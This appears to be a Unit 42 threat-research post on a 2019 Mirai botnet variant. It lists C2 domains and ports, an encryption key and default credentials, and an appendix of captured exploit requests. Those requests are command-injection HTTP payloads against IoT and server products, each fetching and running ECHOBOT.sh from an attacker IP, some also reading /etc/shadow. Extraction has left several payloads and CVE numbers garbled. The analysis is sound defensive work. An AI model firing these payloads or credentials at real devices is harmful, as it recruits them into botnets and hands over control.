# New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices **[unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/](https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/)** Ruchna Nigam June 7, 2019 By [Ruchna Nigam](https://unit42.paloaltonetworks.com/author/ruchna-nigam/) June 6, 2019 at 5:00 PM [Category: Unit 42](https://unit42.paloaltonetworks.com/category/unit42/) Tags: [CVE-2017-5174,](https://unit42.paloaltonetworks.com/tag/cve-2017-5174/) [CVE-2018-11510,](https://unit42.paloaltonetworks.com/tag/cve-2018-11510/) [CVE-2018-17173,](https://unit42.paloaltonetworks.com/tag/cve-2018-17173/) [CVE-2018-6961,](https://unit42.paloaltonetworks.com/tag/cve-2018-6961/) [CVE-2019-2725,](https://unit42.paloaltonetworks.com/tag/cve-2019-2725/) [CVE-2019-3929,](https://unit42.paloaltonetworks.com/tag/cve-2019-3929/) [exploits,](https://unit42.paloaltonetworks.com/tag/exploits/) [IoT,](https://unit42.paloaltonetworks.com/tag/iot/) [Linux,](https://unit42.paloaltonetworks.com/tag/linux/) [Mirai](https://unit42.paloaltonetworks.com/tag/mirai/) This post is also available in: 日本語 [(Japanese)](https://unit42.paloaltonetworks.jp/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/) **Executive Summary** [Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent](https://unit42.paloaltonetworks.com/tag/mirai/) of launching DDoS attacks and self-propagation, since 2016 when it took down several notable targets. As part of this ongoing research, we’ve recently discovered a new variant of Mirai that has eight new exploits against a wide range of embedded devices. These newly targeted devices range from wireless presentation systems to set-top-boxes, SD-WANs, and even smart home controllers. Mirai initially made use of default credentials to gain access to devices. However, since the end of [2017, samples of the family have](https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm/) increasingly been observed making use of publicly available exploits to propagate and run on vulnerable devices. [2018 saw a continued increase in the emergence of campaigns involving variants incorporating several exploits within the same sample,](https://unit42.paloaltonetworks.com/unit42-iot-malware-evolves-harvest-bots-exploiting-zero-day-home-router-vulnerability/) allowing for the harvesting of several different kinds of IoT devices into the same botnet. [Since then we have also observed Mirai malware authors experimenting with new](https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/) [exploits, found on the publicly available exploit-db, to gauge](https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/) gains in bot count from the use of these exploits. This latest new variant we’ve observed and detailed in this post appears to be a continuation of the same trend. **Exploits** This latest variant contains a total of 18 exploits, 8 of which are new to Mirai. The vulnerabilities being exploited in the wild by this new Mirai variant for the first time are listed below with more details in Table 1 in the Appendix: The new samples also include four exploits which have only been used by Mirai in the past: [These new samples also include exploits targeting the Oracle WebLogic Servers RCE vulnerability which has been used by both Linux and](https://unit42.paloaltonetworks.com/muhstik-botnet-exploits-the-latest-weblogic-vulnerability-for-cryptomining-and-ddos-attacks/) Windows botnets. All of the exploits that have already been seen exploited by Mirai in the past have been listed in Table 3 in the Appendix. ----- **a ys s** The new variant we have discovered also has other distinguishing features from the use of the exploits mentioned above. The encryption key used for the string table is 0xDFDAACFD, which is the equivalent of a byte wise XOR with 0x54, based on the [standard encryption scheme (as implemented in the toggle_obf function) used in the original Mirai source code.](https://github.com/jgamblin/Mirai-Source-Code/blob/6a5941be681b839eeff8ece1de8b245bcd5ffb02/mirai/bot/table.c#L138) There are several default credentials used for brute force we have not come across previously in our research (though we cannot confirm this is their first use with Mirai). These are listed in Table 2 in the Appendix along with the devices that make use of them - of note, all of these credentials can be found online. **Infrastructure** The samples were available at an open directory pictured in Figure 1: _Figure 1. Open directory hosting Mirai variant_ Samples of this variant use two domains for C2, at different ports in the different versions, as explained below. The latest version makes use of the two domains below for C2. akuma[.]pw :17 akumaiotsolutions[.]pw:912 While the two domains don't currently resolve to any IP, a search on Shodan for the IP address hosting the samples, indicates port 17 at that address was used for C2 at some point of time. This is seen in the response recorded from port 17 in the screenshot which is the expected [response from a Mirai C2 server based on how the C2 code is written in the original source code.](https://github.com/jgamblin/Mirai-Source-Code/blob/3273043e1ef9c0bb41bd9fcdc5317f7b797a2a94/mirai/cnc/admin.go) ----- _Figure 2. Shodan search result indicating 31.13.195[.]251:17 was used for C2 at one point_ The directory hosting the malware was updated a couple of times, before the final version was uploaded at 26-May-2019 10:05 (server time). Each of the updates were minor where the attackers either edited C2 port numbers or slightly updated the payload. File upload times: 26-May-2019 10:05 21-May-2019 16:34 21-May-2019 08:38 19-May-2019 06:05 The briefly available version from May 21, 2019 at 08:38 made use of the below two domains for C2. They are the same domains as used by the other samples (uploaded on prior or later dates) but the ports are different. akuma[.]pw:1822 akumaiotsolutions[.]pw:721 **Conclusion** This newly discovered variant is a continuation of efforts by Linux malware authors to scout for a wider range and thus, larger number, of IoT devices to form larger botnets thereby affording them greater firepower for DDoS attacks. Based on the results observed by using such variants, the exploits that are more effective i.e. the ones that infect a greater number of devices are retained or reused in future variants whereas the less effective ones are retired or replaced by malware authors with other exploits. Palo Alto Networks customers are protected by: WildFire which detects all related samples with malicious verdicts Threat Prevention and PANDB that block all exploits and IPs/URLs used by this variant. AutoFocus customers can track these activities using individual exploit tags: [CVE-2019-3929](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2019-3929) [OpenDreamBox_RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.OpenDreamBox_RCE) [CVE-2018-6961](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2018-6961) [CVE-2018-7841](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2018-7841) [CVE-2018-11510](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2018-11510) [DellKACE_SysMgmtApp_RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.DellKACE_SysMgmtApp_RCE) [CVE-2017-5174](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2017-5174) [HooTooTripMate_RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.HooTooTripMate_RCE) [BelkinWeMoRCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.BelkinWeMoRCE) [MiCasaVeraLiteRCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.MiCasaVeraLiteRCE) [CVE-2018-17173](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2018-17173) [WePresentCmdInjection](https://autofocus.paloaltonetworks.com/#/tag/Unit42.WePresentCmdInjection) [ASUS DSLModem RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.ASUS_DSLModem_RCE) ----- C [0 9](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2019-2725) 5 [NetgearReadyNAS_RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.NetgearReadyNAS_RCE) [CVE-2014-8361](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2014-8361) [The malware family can be tracked in AutoFocus using the tag Mirai.](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Mirai) **Appendix** **Vulnerability** **Affected** **Devices** [CVE-2019-3929](https://www.exploit-db.com/exploits/46786) Wireless Presentation Systems from [several vendors](https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c) OpenDreamBox [Remote Code](https://www.exploit-db.com/exploits/42293) Execution Devices running OpenDreamBox 2.0.0 - an embedded Linux distribution for Set-Top-Boxes **Exploit Format** POST /cgi-bin/file_transfer.cgi HTTP/1.1 Content-Type: application/x-www-form-urlencoded file_transfer=new&dir='Pa_Notecd wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*Pa_Note POST /webadmin/script?command=|wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.* HTTP/1.1 Content-Length: 630 Accept-Encoding: gzip, deflate Accept: / User-Agent: Hello-World Connection: keep-alive ----- [CVE-2018-6961](https://www.exploit-db.com/exploits/44959) VMware NSX SD-WAN Edge < 3.1.2 [CVE-2018-7841](https://www.exploit-db.com/exploits/46846) Schneider Electric U.motion LifeSpace Management Systems POST /scripts/ajaxPortal.lua HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://www.vmware.com Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Cookie: culture=en-us Connection: close destination=8.8.8.8$(wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpg anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*)&source=192.168.0.1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_dia name=google.com$(cat /etc/shadow |wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*)&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic destination=8.8.8.8$(cat /etc/shadow |wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*)&source=192.168.0.1&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagn POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4 Content-Type: application/x-www-form-urlencoded Content-Length: 86 op=export&language=english&interval=1&object_id=\x60wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*\x60 ----- Dell KACE Remote Code Execution Dell KACE Systems Management Appliances [CVE-2017-5174](https://www.exploit-db.com/exploits/41360) Geutebrück IP Cameras POST /service/krashrpt.php HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept: / User-Agent: Hello-World Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 37 kuid=\x60id | wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpg anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*\x60 POST /uapi-cgi/viewer/testaction.cgi HTTP/1.1 Content-Length: 630 Accept-Encoding: gzip, deflate ip: eth0 1.1.1.1; wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmo ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpg anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.* Accept: / User-Agent: Hello-World Connection: keep-alive POST /protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.* H Content-Length: 630 Accept-Encoding: gzip, deflate Accept: / User-Agent: Hello-World Connection: keep-alive HooToo TripMate Remote Code Execution HooToo TripMate Routers ----- CVE-201811510 Asustor NAS Devices _Table 1. New exploits used in the Mirai variant_ **Default Credentials** **Affected Device(s)** blueangel/blueangel root/abnareum10 root/Admin@tbroad root/superuser [Blue Angel Software Suite, an application that runs on embedded devices for VOIP/SIP services](https://packetstormsecurity.com/files/152720/Blue-Angel-Software-Suite-Command-Execution.html) admin/wbox123 [WBOX IPCameras, NVRs, DVRs](https://www.wboxtech.com/content/files/product_categories/ip_cameras/IPC-NVR-DVR-secure-activation.pdf) admin/pfsense [Netgate pfSense, an open source platform for traditional Firewall, VPN and Routing needs](https://docs.netgate.com/pfsense/en/latest/usermanager/pfsense-default-username-and-password.html) admin/aerohive [Aerohive devices, a networking hardware vendor](https://thehivecommunity.aerohive.com/s/question/0D50c00006da0wW/default-username-and-password?language=en_US) root/awind5885 [Crestron AirMedia AM-100 Presentation Gateways](https://www.exploit-db.com/exploits/40813) hadoop/123456 hadoop/hadoop@123 hadoop/hadoopuser Hadoop instances root/ikwd Toshiba IP Cameras _Table 2. Unusual default credentials used in the Mirai variant_ **Vulnerability** **Affected** **Devices** **Exploit Format** ----- CVE-20192725 CVE-201817173 WePresent [Command](https://www.exploit-db.com/exploits/41935) Injection ASUS DSL Modem [Remote](https://www.exploit-db.com/exploits/45135) Code Execution Oracle WebLogic Servers LG Supersign TVs WePresent WiPG-1000 Wireless Presentation systems ASUS DSLN12E_C1 1.1.2.3_345 POST /_async/AsyncResponseServiceHttps HTTP/1.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) User-Agent: Hello-World Connection: close Content-Type: text/xml xx xmlns:work=http://bea.com/2004/06/soap/workare wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 EC 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 &1+|+;w -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; ch ECHOBOT1.sh; rm -rf ECHOBOT.*; >/tmp/f ;&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth= Content-Length: 630 Accept-Encoding: gzip, deflate User-Agent: Hello-World Host: 192.168.0.1:9080 Connection: keep-alive POST /cgi-bin/rdfs.cgi HTTP/1.1 Host: 192.168.0.1:80 application/x-www-form-urlencoded Content-Length: 1024 Client=;wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOB ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p GET /Main_Analysis_Content.asp? current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.target.c g987b580&cmdMethod=ping&destIP=wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous Host: 192.168.0.1:80 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 Connection: keep-alive User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://www.target.com/Main_Analysis_Content.asp Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 ----- Belkin WeMo Remote Code Execution MiCasa VeraLite [Remote](https://www.exploit-db.com/exploits/40589) Code Execution Belkin WeMo Devices MiCasa VeraLite Smart Home Controllers POST /upnp/control/basicevent1 HTTP/1.1 Host: 20.36.21.25:49152 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.18.4 SOAPAction: urn:Belkin:service:basicevent:1#SetSmartDevInfo Content-Length: 393 \x60wget http://31.13.195[.]251/ECHOBOT.x -O /tmp/ECHOBOT; chmod 777 /tmp/ECHOBOT POST /upnp/control/hag HTTP/1.1" Host: %s:49451 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.7 Content-Type: text/xml;charset=UTF-8 MIME-Version: 1.0 Content-Length: 311 Connection: keep-alive Pragma: no-cache SOAPAction: urn:schemas-micasaverde-org:service:HomeAutomatio nGateway:1#RunLua < http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; s chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 E ----- Netgear ReadyNas [Remote](https://www.exploit-db.com/exploits/42956) Code Execution GoAhead Remote Code Execution CVE-20148361 Netgear ReadyNas / [NUUO NVRs](https://www.exploit-db.com/exploits/45070) IP cameras manufactured by GoAhead, Aldi, and several others Devices using the Realtek SDK with miniigd daemon POST /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27; wget http://31.13.195[.]251/ECHOBOT.sh; c ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh EC ECHOBOT.*%205;%27 HTTP/1.1 Content-Length: 630 Accept-Encoding: gzip, deflate Accept: / User-Agent: Hello-World Connection: keep-alive GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27; wget http://31.13.195[.]251/ECHOBOT.sh; cu ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh EC HTTP/1.1 Host: 192.168.0.1:50000 Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192 .168.1.1&port=21&user=ftp&pwd=$(wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/E ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p POST /wanipcn.xml HTTP/1.1 Content-Length: 630 Accept-Encoding: gzip, deflate SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping' Accept: / User-Agent: Hello-World Connection: keep-alive